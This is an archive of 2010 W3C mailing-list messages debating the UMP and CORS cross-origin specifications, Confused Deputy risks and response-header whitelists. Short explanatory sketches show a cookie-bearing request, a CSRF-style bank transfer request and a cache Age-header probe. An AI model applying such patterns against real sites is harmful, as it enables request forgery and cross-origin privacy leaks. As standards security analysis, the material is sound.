 this section - based on stuff from maybe Maciej's presentation - 
 which
 I found really informative. He could also cite UMP as a possible
 option for those worried about security.

 I agree that the security section in CORS needs to be improved.

 As for the should CORS exist discussion, I'll bow out of those until
 we're starting to move towards officially adopting a WG decision one
 way or another, or genuinely new information is provided which would
 affect such a decision (for the record, I don't think I've seen any
 new information provided since last fall's TPAC).

 A smart guy once told me that You can't tell people anything,
 meaning they have to experience it for themselves before they really
 get it. Has Mozilla tried to build anything non-trivial using CORS
 where cookies + Origin are the access control mechanism? If so, I'll
 do a security review of it and we'll see what we learn.

 Not to my knowledge, no. I believe we use CORS for tinderboxpushlog
 [1], however since that is only dealing with public data I don't
 believe it uses cookies or Origin headers.

 Does anyone have something?

 At the risk of getting myself involved in this discussion again, you
 might consider doing a security analysis of Facebook Chat.  Although
 Facebook Chat uses postMessage, it uses both cookies and postMessage's
 origin property for authentication, so it might be a system of the
 kind you're interested in analyzing.


 I think (although I'm not certain) that Tyler is asking partially to
 figure out where a non-anonymous CORS request is used in the real
 world. If he isn't, then I am :)

 Given that a major (but not the only) claim of the need to adopt CORS
 with support for cookies and the Origin header is that it is in fact
 already implemented and shipping, it would be good to see how it's
 being used. If we can't find any examples of it being used (in the
 non-anonymous case, at least), then the argument against us having to
 keep it would hold less water. If we can find it being used, then we
 can see both how we would handle the case with UMP, and whether or not
 the CORS usage is in fact secure.

 Oh, I misunderstood.  I thought he wanted to do a security review to
 show that there was a confused deputy causing problems.

 Both Adam and Dirk understood correctly. Ideally, I'd like an actual
 CORS example to work on, since I'd have to make analogies with
 postMessage(), and I've already made a ton of analogies, apparently to
 little effect. If people don't fully appreciate the relationship
 between form based CSRF and CORS based Confused Deputy, then we need
 an actual CORS application.

 Out of curiosity, who are the 3 parties involved in the facebook chat
 example? The little chat widget in the corner of the facebook page
 looks like a same origin application.

 Facebook uses a lot of different domains for different purposes.  I
 don't have a complete count, but at least a dozen.  The chat feature
 itself uses a bunch, possibly to get around various connection limits
 in browsers.

This doesn't seem like a good example then, since the attacker would
have to be Facebook itself. For robustness, I personally consider
these scenarios when designing an application, but people on this list
might not find it compelling. They might also argue that no attempt
was made to protect against such a vulnerability.

 Keep in mind that the browser's notion of an origin is often much
 smaller than a single application, which is part of the reason web
 developers are so keen on CORS.  Many of them plan to use it only to
 talk to trusted hosts without having to use goofy things like JSONP.

Enabling this scenario is a fine thing, but it's not the scenario we
should be using to test the security properties of CORS. UMP also
enables communication between fully trusted participants.

Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 5:36 PM, Dirk Pranke dpra...@google.com wrote:
 On Wed, May 12, 2010 at 5:15 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 5:07 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:56 PM, Tyler Close tyler.cl...@gmail.com wrote:
 Both Adam and Dirk understood correctly. Ideally, I'd like an actual
 CORS example to work on, since I'd have to make analogies with
 postMessage(), and I've already made a ton of analogies, apparently to
 little effect. If people don't fully appreciate the relationship
 between form based CSRF and CORS based Confused Deputy, then we need
 an actual CORS application.

 Out of curiosity, who are the 3 parties involved in the facebook chat
 example? The little chat widget in the corner of the facebook page
 looks like a same origin application.

 Facebook uses a lot of different domains for different purposes.  I
 don't have a complete count, but at least a dozen.  The chat feature
 itself uses a bunch, possibly to get around various connection limits
 in browsers.

 This doesn't seem like a good example then, since the attacker would
 have to be facebook itself. For robustness, I personally consider
 these scenarios when designing an application, but people on this list
 might not find it compelling. They might also argue that no attempt
 was made to protect against such a vulnerability.

 Keep in mind that the browser's notion of an origin is often much
 smaller than a single application, which is part of the reason web
 developers are so keen on CORS.  Many of them plan to use it only to
 talk to trusted hosts without having to use goofy things like JSONP.

 Enabling this scenario is a fine thing, but it's not the scenario we
 should be using to test the security properties of CORS. UMP also
 enables communication between fully trusted participants.

 It seems like a fine scenario to me. We know people want to use CORS
 for this purpose because it makes their code easier and cleaner (both
 of which are nice security things in and of themselves). If both CORS
 and UMP are secure for this use case, then an interesting question is,
 which is easier to use? This is particularly relevant insofar as
 the existing JSONP-based solution uses cookies, since CORS would
 support this but UMP wouldn't (meaning the degree of rework in the app
 necessary to support the code would be higher).

 Note that I am not saying that this should be the only scenario to be
 reviewed, but you shouldn't just pick and choose the cases that best
 fit your hypothesis.

Over the course of this discussion, I've taken every use-case, with
every arbitrary constraint that anyone wants to add and shown a
corresponding UMP solution, so it is grossly unfair to accuse me of
picking and choosing cases.

For this particular discussion, we were explicitly looking for an
example of a Confused Deputy vulnerability in an actual CORS
application. Such a thing doesn't exist in a scenario with only 2
parties and no attacker. When testing security properties, you need an
attacker.

All that said, if you want to compare the usability of CORS and UMP in
a 2 party interaction between fully trusted participants, we can do
that. Go ahead and sketch out the challenge problem and corresponding
CORS solution.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 6:33 PM, Ian Hickson i...@hixie.ch wrote:
 On Wed, 12 May 2010, Tyler Close wrote:
 
  It is also not a question of opinion, but fact. CORS uses ambient
  authority for access control in 3 party scenarios. CORS is therefore
  vulnerable to Confused Deputy.
 
  That's like saying that HTML uses markup and is therefore vulnerable
  to markup injection. It's a vast oversimplification and overstatement
  of the problem.

 Is it really? XSS is a major problem. HTML provides no facility for
 dealing with XSS and practically invites it. It's hard to deal with this
 situation now since HTML is so widely deployed. CORS invites Confused
 Deputy problems but is not yet widely deployed. We can still do
 something about it.

 HTML's use of markup is not a vulnerability.
 CORS's use of ambient authority is not a vulnerability.

 Sure, both can be used in vulnerable ways, but they are not themselves
 vulnerabilities.

So HTML is not vulnerable to Cross-Site Scripting, C++ is not
vulnerable to buffer overflows and so CORS is not vulnerable to
Confused Deputy.

There's something very Alice in Wonderland about all this Humpty
Dumpty talk and accusations of nonsense.

If there are special precautions that must be taken to avoid a
problem, then you are vulnerable to that problem. From a security
perspective we are interested in what precautions a technology
requires developers to take and whether or not it's feasible to apply
those precautions. Direct memory management forces C++ developers to
consider what kind of library, technique or verifier they'll use to
protect themselves against memory access errors. Automatic sending of
credentials forces CORS developers to consider how they'll protect
themselves against Confused Deputy problems. The requirement for a
defense is inherent in the design of the tool.

Using UMP, you can build an app without the use of credentials, and so
without needing to consider Confused Deputy vulnerabilities.
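
In wire terms, the difference is roughly this (host names, cookie name
and value are made up for illustration). A CORS request with
credentials carries state the page never chose to send:

GET http://example.org/private HTTP/1.0
Origin: app.example.com
Cookie: session=8f2a90c1

The corresponding uniform request is just:

GET http://example.org/private HTTP/1.0

Whatever the second request can fetch, it could fetch no matter whose
browser issued it, so there is no ambient authority for an attacker to
redirect.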

  It is quite possible to write perfectly safe n-party apps.

 It is also quite possible to stand on your head while riding a bicycle.
 What's your point?

 My point is that you are arguing that one design is less good than
 another, but you are using words that make it sound like you are arguing
 that one design is actually intrinsically vulnerable.

As explained above, CORS with credentials is intrinsically vulnerable
to Confused Deputy. The use of credentials forces the developer to
consider Confused Deputy vulnerabilities.

 It's just as possible
 to make bad designs using UMP as with CORS.

It's rare that a tool makes bad design impossible. Are you saying
that's the metric for comparing the security of two tools? So long as
bad design is possible, the two tools are equivalent?

 (I would argue that UMP
 actually makes it more likely that designs will have poor security
 characteristics since it ends up being easier to ask for the user's
 credentials directly than doing the right thing. With CORS, on the other
 hand, it's easier to use the user's existing session, so it's less likely
 that people will ask for credentials inappropriately.)

But you haven't considered the dangers that come from reusing the
user's existing session. That's an inherently dangerous thing to do,
but you seem to ignore the problem and so come to the conclusion you
want.

 No one has laid out a clear strategy for developers to follow to use
 CORS safely and shown how to apply it to expected use cases.

 What use cases would you like examples for? Let's write them up and give
 them to Anne for the introduction section.

I want to see CORS try to develop something like the Security
Considerations section in UMP with simple, clear choices for
application developers to consider. I want this advice to be feasible
to follow and to provide a robust defense against Confused Deputy
problems. I doubt such advice can be provided for CORS.

 The CORS spec doesn't even mention Confused Deputy problems.

 I'm sure Anne would be happy to include suitable text if you provide it.
 However, such text has to be accurate, and not make false claims like
 saying that there is a security vulnerability where there is only the
 potential for one when the feature is misused.

CORS doesn't even say yet how to use it safely, so what does it mean
to misuse it?

We may also have a different perspective on what it means to be candid
about the problems facing developers.

   It is certainly possible to mis-use CORS in insecure ways, but then
   it's also possible to mis-use UMP in insecure ways.

 You could justify any kind of security weakness with that kind of logic.
 Nuclear waste can be used in insecure ways, but then so can hammers.

 No. There is a _massive_ difference between features that _may_ be
 misused, and features that _cannot be used safely_. For example, if XHR
 let you read data from any site without any sort of server opt-in, that
 would be a real security vulnerability, and could not be defended by
 saying

Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
Firefox, Chrome and Caja have now all declared an interest in
implementing UMP. Opera and Safari have both declared an interest in
implementing the functionality defined in UMP under the name CORS. I
think it's clear that UMP has sufficient implementor interest to
proceed along the standardization path.

In the discussion on chromium-dev, Adam Barth wrote:


Putting these together, it looks like we want a separate UMP
specification for web developers and a combined CORS+UMP specification
for user agent implementors.  Consequently, I think it makes sense for
the working group to publish UMP separately from CORS but have all the
user agent conformance requirements in the combined CORS+UMP document.


See:

http://groups.google.com/a/chromium.org/group/chromium-dev/msg/4793e08f8ec98914?hl=en_US

I think this is a satisfactory compromise and conclusion to the
current debate. Anne, are you willing to adopt this strategy? If so, I
think there needs to be a normative statement in the CORS spec that
identifies the algorithms and corresponding inputs that implement UMP.

Before sending UMP to Last Call, we need a CORS and UMP agreement on
response header filtering. We need to reconcile the following two
sections:

http://dev.w3.org/2006/waf/access-control/#handling-a-response-to-a-cross-origin-re

and

http://dev.w3.org/2006/waf/UMP/#response-header-filtering

Remaining subset issues around caching and credentials can be
addressed with editorial changes to CORS. I'll provide more detail in
a later email, assuming we've reached a compromise.

--Tyler

On Mon, Apr 19, 2010 at 12:43 AM, Anne van Kesteren ann...@opera.com wrote:
 Hopefully it helps to call attention to this in a separate thread.

 In http://lists.w3.org/Archives/Public/public-webapps/2010AprJun/0043.html
 Maciej states Apple has no interest in implementing UMP from the UMP
 specification. (I believe this means that a CORS defined subset that roughly
 matches UMP is fine.) They want to retain their CORS support.

 For Opera I can say we are planning on supporting CORS in due course and
 have no plans on implementing UMP from the UMP specification.

 It would be nice if the three other major implementors (i.e. Google,
 Mozilla, and Microsoft) also stated their interest in both specifications,
 especially including whether removing their current level of CORS support is
 considered an option.


 --
 Anne van Kesteren
 http://annevankesteren.nl/





-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
On Tue, May 11, 2010 at 10:54 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 11 May 2010 19:48:57 +0200, Tyler Close tyler.cl...@gmail.com
 wrote:

 Firefox, Chrome and Caja have now all declared an interest in
 implementing UMP. Opera and Safari have both declared an interest in
 implementing the functionality defined in UMP under the name CORS. I
 think it's clear that UMP has sufficient implementor interest to
 proceed along the standardization path.

 In the discussion on chromium-dev, Adam Barth wrote:

 
 Putting these together, it looks like we want a separate UMP
 specification for web developers and a combined CORS+UMP specification
 for user agent implementors.  Consequently, I think it makes sense for
 the working group to publish UMP separately from CORS but have all the
 user agent conformance requirements in the combined CORS+UMP document.
 

 See:


 http://groups.google.com/a/chromium.org/group/chromium-dev/msg/4793e08f8ec98914?hl=en_US

 I think this is a satisfactory compromise and conclusion to the
 current debate. Anne, are you willing to adopt this strategy? If so, I
 think there needs to be a normative statement in the CORS spec that
 identifies the algorithms and corresponding inputs that implement UMP.

 I don't understand. As far as I can tell Adam suggests making UMP an
 authoring guide.

I read Adam as saying the UMP specification should be published. The
words "authoring guide" don't appear. I believe his reference to a
benefit for web developers refers to an opinion expressed earlier in
the thread that the UMP specification is more easily understood by web
developers.

 Why would CORS need to normatively depend on it?

For developers to be able to rely on the normative statements made in
UMP when using a CORS implementation,  CORS must normatively claim to
be implementing UMP.

 Before sending UMP to Last Call, we need a CORS and UMP agreement on
 response header filtering. We need to reconcile the following two
 sections:


 http://dev.w3.org/2006/waf/access-control/#handling-a-response-to-a-cross-origin-re

 and

 http://dev.w3.org/2006/waf/UMP/#response-header-filtering

 Remaining subset issues around caching and credentials can be
 addressed with editorial changes to CORS. I'll provide more detail in
 a later email, assuming we've reached a compromise.

 I think we first need to figure out whether we want to rename headers or
 not, before any draft goes to Last Call, especially if UMP wants to remain a
 subset of some sort.

AFAICT, your renaming proposal does not cover this section of CORS. I
think the two efforts can proceed in parallel. I look forward to your
feedback on this topic.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
On Tue, May 11, 2010 at 11:41 AM, Ojan Vafai o...@chromium.org wrote:
 What is the difference between an authoring guide and a specification for
 web developers?

The difference is whether or not the normative statements in UMP
actually are normative for a CORS implementation. This comes down to
whether or not a developer reading UMP can trust what it says, or must
he also read the CORS spec.

 The key point of making this distinction is that
 implementors should be able to look solely at the combined spec.

No, the key point is to relieve developers of the burden of reading
and understanding CORS. The CORS spec takes on the burden of restating
UMP in its own algorithmic way so that an implementor can read only
CORS.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
On Tue, May 11, 2010 at 12:36 PM, Arthur Barstow art.bars...@nokia.com wrote:
 Jonas, Anne, Tyler, All,

 On May 11, 2010, at 3:08 PM, ext Jonas Sicking wrote:

 Personally I would prefer to see the UMP model be specced as part of
 the CORS spec, mostly to avoid inevitable differences between two
 specs trying to specify the same thing. And creating an authoring
 guide specifically for the UMP security model to help authors that
 want to just use UMP.

 Yes, I would also prefer that. Are there any technical reason(s) this can't
 be done?

CORS introduces subtle but severe Confused Deputy vulnerabilities
which should prevent it from being standardized. Some believe/hope
these vulnerabilities can be mitigated, but the suggested techniques
are not well explained yet, will be overly constraining and will not
work in many common cases. So far, the CORS document does not even
explain these problems, let alone offer convincing solutions.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-21 Thread Tyler Close
On Wed, Apr 21, 2010 at 8:57 AM, Anne van Kesteren ann...@opera.com wrote:
 Uniform doesn't tell you much about what it is doing.

The term uniform in Uniform Messaging Policy (UMP) is used in the
same sense as it is used in Uniform Resource Identifier (URI). In
particular, the following from RFC 3986 is most relevant:

URIs have a global scope and are interpreted consistently regardless
of context, ...

The UMP defines a way to produce an HTTP request regardless of
context. Today, browsers can only produce requests that are entangled
with the user-agent's local context and this is the key to enabling
CSRF-like vulnerabilities. Well formed, legitimate Web content that
expresses an HTTP request might be harmless when viewed from an
attacker's user-agent, but if the exact same content is viewed through
a victim's user-agent, there is a successful attack. The difference
between the two requests is simply the change of context. The
well-known CSRF attack is not the only way to cause mischief by
switching the local context of an HTTP request. There is a whole
family of similar attacks that use the same pattern, called Confused
Deputy. The UMP enables web content to avoid this whole family of
attacks by making requests from the global scope, rather than from the
user-agent's local context.

Today, requesting content is interpreted differently depending on
context. The UMP makes this interpretation uniform, and so the
produced HTTP request is the same no matter where it is produced from.
This uniformity allows web content to avoid the built-in Confused
Deputy vulnerabilities in the user-agent. Uniformity is the crux of
what the UMP does.
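
To make that concrete, here is a minimal sketch; "UniformRequest" is only
a placeholder name for an XHR-like API that issues uniform requests, not
something the spec mandates:

  // "UniformRequest" is a placeholder name, not a mandated API. The request
  // expressed below carries no cookies, no HTTP auth and no TLS client
  // certificate, so it reads the same whether an attacker's user-agent or a
  // victim's user-agent sends it.
  var ur = new UniformRequest();
  ur.open("POST", "https://bank.example.com/transfer");
  ur.onload = function () { /* inspect ur.responseText */ };
  ur.send("amount=100&to=12345");
  // With today's XMLHttpRequest the same content is entangled with the
  // user-agent's local context: the victim's cookies ride along and can turn
  // harmless-looking content into a successful CSRF.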

As MarkM noted, uniformity is not the same as anonymity. I can compose
web content that produces a request that declares my identity. Using
the UMP, I can ensure that the produced request is the same, no matter
where the request is issued from. The produced request still declares
my identity and so is not anonymous.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-20 Thread Tyler Close
On Mon, Apr 19, 2010 at 6:47 PM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 20 Apr 2010 00:38:54 +0900, Jonas Sicking jo...@sicking.cc wrote:

 As I've said before. I'd be interested in implementing UMP in firefox
 if we can come  up with a reasonable API for using it. I.e. a separate
 constructor or flag or similar on XHR. This is assuming that UMP is a
 reasonable subset of CORS.

 Have you looked at the proposal I put in XHR2? It sets certain flags in CORS
 that make it more or less the same as UMP.

Why can't it be made exactly like UMP? All of the requirements in UMP
have been discussed at length and in great detail on this list by some
highly qualified people. The current UMP spec reflects all of that
discussion. By your own admission, the CORS spec has not received the
same level of review for these features. Why hasn't CORS adopted the
UMP solution?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-20 Thread Tyler Close
On Tue, Apr 20, 2010 at 11:39 AM, Maciej Stachowiak m...@apple.com wrote:

 On Apr 20, 2010, at 9:27 AM, Tyler Close wrote:

 On Mon, Apr 19, 2010 at 6:47 PM, Anne van Kesteren ann...@opera.com
 wrote:

 On Tue, 20 Apr 2010 00:38:54 +0900, Jonas Sicking jo...@sicking.cc
 wrote:

 As I've said before. I'd be interested in implementing UMP in firefox
 if we can come  up with a reasonable API for using it. I.e. a separate
 constructor or flag or similar on XHR. This is assuming that UMP is a
 reasonable subset of CORS.

 Have you looked at the proposal I put in XHR2? It sets certain flags in
 CORS
 that make it more or less the same as UMP.

 Why can't it be made exactly like UMP? All of the requirements in UMP
 have been discussed at length and in great detail on this list by some
 highly qualified people. The current UMP spec reflects all of that
 discussion. By your own admission, the CORS spec has not received the
 same level of review for these features. Why hasn't CORS adopted the
 UMP solution?

 It should be made exactly like UMP, either by changing CORS, or changing
 UMP, or some combination of the two. A list of differences between UMP and
 CORS anonymous mode would be most helpful.

Some of these issues are listed at the top of:

http://lists.w3.org/Archives/Public/public-webapps/2010AprJun/0060.html

Many of the differences arise from CORS being silent about relevant
issues, such as caching or received cookies, so it's hard to know what
the CORS stand on these issues is. This part of the CORS spec is just
not well developed yet.

Since there are still major outstanding issues against other parts of
the CORS spec, I still think it's a better idea to move forward with
separate documents, where the CORS spec references the UMP spec for
its credential-free mode.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-20 Thread Tyler Close
On Tue, Apr 20, 2010 at 11:36 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Tue, Apr 20, 2010 at 9:27 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Mon, Apr 19, 2010 at 6:47 PM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 20 Apr 2010 00:38:54 +0900, Jonas Sicking jo...@sicking.cc wrote:

 As I've said before. I'd be interested in implementing UMP in firefox
 if we can come  up with a reasonable API for using it. I.e. a separate
 constructor or flag or similar on XHR. This is assuming that UMP is a
 reasonable subset of CORS.

 Have you looked at the proposal I put in XHR2? It sets certain flags in CORS
 that make it more or less the same as UMP.

 Why can't it be made exactly like UMP? All of the requirements in UMP
 have been discussed at length and in great detail on this list by some
 highly qualified people. The current UMP spec reflects all of that
 discussion. By your own admission, the CORS spec has not received the
 same level of review for these features. Why hasn't CORS adopted the
 UMP solution?

 Would you be fine with folding UMP into CORS if more of the wording
 from UMP is used in the CORS spec?

 Are the differences only editorial or are there different header
 names/values as well?

The differences are not only editorial. The problem is missing MUST
statements in the CORS spec, governing what the user-agent does. The
on-the-wire parts are nearly identical. The header names and values
are consistent (or will be once CORS response header filtering is
fixed).

Ideally, I'd like UMP to be folded into CORS by reference rather than
by value, since there are major outstanding issues against CORS that
don't affect UMP.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-19 Thread Tyler Close
On Mon, Apr 19, 2010 at 10:55 AM, Julian Reschke julian.resc...@gmx.de wrote:
 On 19.04.2010 19:37, Tyler Close wrote:

 The default members of the above whitelist include response entity
 headers defined by [HTTP], plus the Location and Warning headers. The

 Why are you ignoring other headers in the permanent registry? Why only
 allow
 entity headers? What's the problem, for instance, with Allow (RFC 2616),
 Allow-Patch (RFC 5749) or Dav (RFC 4918)?

 The default members of the whitelist define the minimum set of headers
 to allow. If the response entity is delivered, then at a minimum, the
 response entity headers should accompany it, assuming it is safe to do
 so. I manually vetted those headers. To support redirection, we need
 Location. Warning is needed in case the requesting content wants to
 reject stale responses. The server must then explicitly opt into
 anything beyond the minimum header set.

 Again: did you check all the headers in the permanent registry? If you did,
 why are the ones (which are just examples) missing? And what's the reason to
 default to strip general headers and response headers?

Again, the model is to define a minimal whitelist and enable servers
to explicitly extend the minimal whitelist. The default members of the
whitelist only exist as a convenience, so that servers don't have to
explicitly list them on every response.

Also, asking a static specification to keep up with a mutable registry
is not feasible.

 default part of the whitelist does not include: headers used for
 credential authentication, such as WWW-Authenticate; nor headers that
 might reveal private network configuration information, such as Via;

 What's the rational for stripping all of the information in Via?

 Are you suggesting UMP specify an algorithm for filtering out only
 some Via header values?

 I'm concerned that by simply dropping the header, you profile too much.

It is not simply dropped, it can be enabled by any server or proxy in
the request path.
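
For example, assuming the Uniform-Headers opt-in syntax discussed
elsewhere in this thread, a server or proxy that lists Via in that header
makes it readable through the usual accessor (a sketch, URLs illustrative):

  // Sketch only: the response carries, e.g.
  //   Uniform-Headers: Via
  // which extends the default whitelist. Without that opt-in the accessor
  // below returns null.
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://api.example.org/resource");
  xhr.onload = function () {
    var via = xhr.getResponseHeader("Via"); // null unless the server opted in
  };
  xhr.send();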

 nor caching headers, such as Age, which provide explicit information
 about requests made on behalf of other requesting content.
 

 What's the problem with Age, please clarify?

 Content from one origin can tell exactly how long ago content from
 another origin requested the cached content. That's at least a privacy
 issue, and possibly a confidentiality issue.

 That appears to be an issue completely independently of CORS/UMP.

It is not at all independent. There was no way to access the Age
header cross-origin before CORS/UMP. If Age is allowed by default then
any page can ask What did you know and when did you know it?, which
is, of course, a powerful question.
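
A sketch of the probe (URLs illustrative):

  // Sketch only: if Age were readable by default, any page could probe how
  // recently content from some other origin pulled a shared, cacheable
  // resource through the same cache.
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://cdn.example.net/widget.js");
  xhr.onload = function () {
    var age = xhr.getResponseHeader("Age"); // seconds the entry has sat in cache
    // A small value implies some other requester fetched it recently.
  };
  xhr.send();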

 If that's
 the case, it should be mentioned in the HTTPbis security considerations,

Last I heard, HTTPbis punted on explaining anything to do with the
Same Origin Policy security model that has evolved around HTTP. I
asked them to and they refused.

 but doesn't necessarily require blocking.

Again, it's not blocked. It just requires an explicit opt-in.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-19 Thread Tyler Close
On Mon, Apr 19, 2010 at 11:39 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Mon, Apr 19, 2010 at 11:30 AM, Maciej Stachowiak m...@apple.com wrote:

 On Apr 19, 2010, at 10:06 AM, Tyler Close wrote:

     Uniform-Headers = "Uniform-Headers" ":" ( "*" | #field-name )

 [...]

 Are Apple and/or Firefox interested in implementing the above? Does
 mnot or other HTTP WG members consider the above a satisfactory
 solution to ISSUE-90?

 I'm interested in implementing a feature along these lines if it goes into
 CORS. If it's UMP-only, then no, and I would object that it violates the
 subset relation.

 I am also not sure the * value is a good idea. It is tempting in its
 convenience but seems likely to cause unintended consequences.

 I agree with everything Maciej said.

 This time.

Thanks for the quick response time.

If this is a good feature, shouldn't the pressure be on CORS to adopt
it, rather than for UMP to drop it? Otherwise, it might seem politics
are overriding technical virtue.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-14 Thread Tyler Close
I have been studying CORS ISSUE-90
http://www.w3.org/2008/webapps/track/issues/90, so as to bring UMP
into line with this part of CORS. I can't find any pattern or
rationale to the selection of headers on the whitelist versus those
not on the whitelist. Does anyone know where this list came from and
how it was produced?

If I produce a more comprehensive whitelist for UMP will CORS follow my lead?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-14 Thread Tyler Close
On Wed, Apr 14, 2010 at 9:41 AM, Tyler Close tyler.cl...@gmail.com wrote:
 I have been studying CORS ISSUE-90
 http://www.w3.org/2008/webapps/track/issues/90, so as to bring UMP
 into line with this part of CORS. I can't find any pattern or
 rationale to the selection of headers on the whitelist versus those
 not on the whitelist. Does anyone know where this list came from and
 how it was produced?

 If I produce a more comprehensive whitelist for UMP will CORS follow my lead?

The following whitelist includes all end-to-end response headers
defined by HTTP, unless there is a specific security risk:

# Age
# Allow
# Cache-Control
# Content-Disposition
# Content-Encoding
# Content-Language
# Content-Length
# Content-Location
# Content-MD5
# Content-Range
# Content-Type
# Date
# ETag
# Expires
# Last-Modified
# Location
# MIME-Version
# Pragma
# Retry-After
# Server
# Vary
# Warning

Does anyone object to making this the new whitelist for both CORS and UMP?

--Tyler



Re: [UMP] Subsetting (was: [XHR2] AnonXMLHttpRequest())

2010-04-12 Thread Tyler Close
On Mon, Apr 12, 2010 at 6:49 AM, Arthur Barstow art.bars...@nokia.com wrote:
 Maciej, Tyler - thanks for continuing this discussion. I think it would be
 helpful to have consensus on what we mean by subsetting in this context.
 (Perhaps the agreed definition could be added to the CORS and UMP Comparison
 [1].)

I've added a new section to the wiki page, UMP as subset of CORS:

http://www.w3.org/Security/wiki/Comparison_of_CORS_and_UMP#UMP_as_subset_of_CORS

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Subsetting (was: [XHR2] AnonXMLHttpRequest())

2010-04-12 Thread Tyler Close
On Mon, Apr 12, 2010 at 1:00 PM, Maciej Stachowiak m...@apple.com wrote:

 On Apr 12, 2010, at 10:33 AM, Tyler Close wrote:

 On Mon, Apr 12, 2010 at 6:49 AM, Arthur Barstow art.bars...@nokia.com
 wrote:

 Maciej, Tyler - thanks for continuing this discussion. I think it would
 be
 helpful to have consensus on what we mean by subsetting in this context.
 (Perhaps the agreed definition could be added to the CORS and UMP
 Comparison
 [1].)

 I've added a new section to the wiki page, UMP as subset of CORS:


 http://www.w3.org/Security/wiki/Comparison_of_CORS_and_UMP#UMP_as_subset_of_CORS


 I do not think the set of subset criteria posted there matches what I
 proposed and what we've been discussing in this thread.

I intended criteria #3 to correspond to conditions A1+B2 in our last
email exchange, which covers an UMP API to CORS resource message
exchange. The last unnumbered criteria corresponds to conditions A2+B1
in our last email exchange, which covers a CORS API to UMP resource
message exchange. Criteria #1 and #2 correspond to the additional
safety aspects of condition C that you wanted explicitly stated.

What aspect of the subset criteria have I missed?

 Should I put some
 abbreviated form of my proposal in the wiki? I am not sure what the
 conventions are for editing this wiki page.

 I think the points you make on the wiki about cross-endangerment are good,
 but they are not really subset criteria, that's a property we want for any
 two Web platform features, and it could be achieved with a strategy of
 making things completely different instead of the subset strategy. They do
 represent relations that we should maintain however.

I included these because our last email exchange indicated to me that
you wanted them explicitly stated.

 I think even taken together, your set of subset conditions does guarantee
 that a CORS client implementation is automatically also a UMP client
 implementation. If we went that way, then we would have to consider whether
 there will ever be client implementors of UMP itself, or it will be
 impossible to fulfill CR exit criteria.

If there are implementers of CORS, then by definition, there are
implementers of UMP. I don't see anything in CR exit criteria that
requires implementers to swear not to also implement other
specifications.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Request for Last Call

2010-04-08 Thread Tyler Close
On Thu, Apr 8, 2010 at 5:44 AM, Marcos Caceres marc...@opera.com wrote:
 To me personally, it only really makes sense for UMP to be merged into CORS.
 Having both specs is confusing.

Given that we've created a superset-subset relationship between CORS
and UMP, we don't have divergent specs for the same functionality;
instead we simply have a modular spec. Splitting the spec this way is
useful because the UMP subset is significantly smaller and the CORS
superset involves additional, complicated security risks.

 To have UMP as an optional add-on does not
 feel right because of the DBAD issue.

Indeed, DBAD is only relevant to CORS, so adding this complexity to
UMP by putting it in the same document with the rest of CORS is
confusing.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Subsetting (was: [XHR2] AnonXMLHttpRequest())

2010-04-08 Thread Tyler Close
On Wed, Feb 3, 2010 at 7:40 PM, Maciej Stachowiak m...@apple.com wrote:
 Actually, the other proposal is to provide an XHR-like API that would use 
 CORS forcing a unique origin as an input parameter - there is no need to
 My hope is that this would be semantically equivalent to using UMP.

This unique origin would still need to discard Set-Cookie response
headers to prevent the accumulation of credentials associated with the
unique origin. It would also need to prohibit the reuse of a TLS
client authenticated connection or NTLM authenticated connection. It
would also need to prevent use of cache entries populated by
non-uniform requests. The CORS draft is also unclear on what happens
with the Referer header.

 What I'm looking for is a clear and objective way to evaluate the desired 
 subset properties. Here are some clear-cut subset properties that I think 
 will give most of the interoperability and ease of implementation you want:

 (A) Every Uniform Request should also be a valid CORS request.
...with the same semantics. The goals being:
1) an UMP API can safely and successfully send a uniform request to a
CORS resource
2) a CORS API can safely send a request to an UMP resource, which may
choose to either fail or allow the request

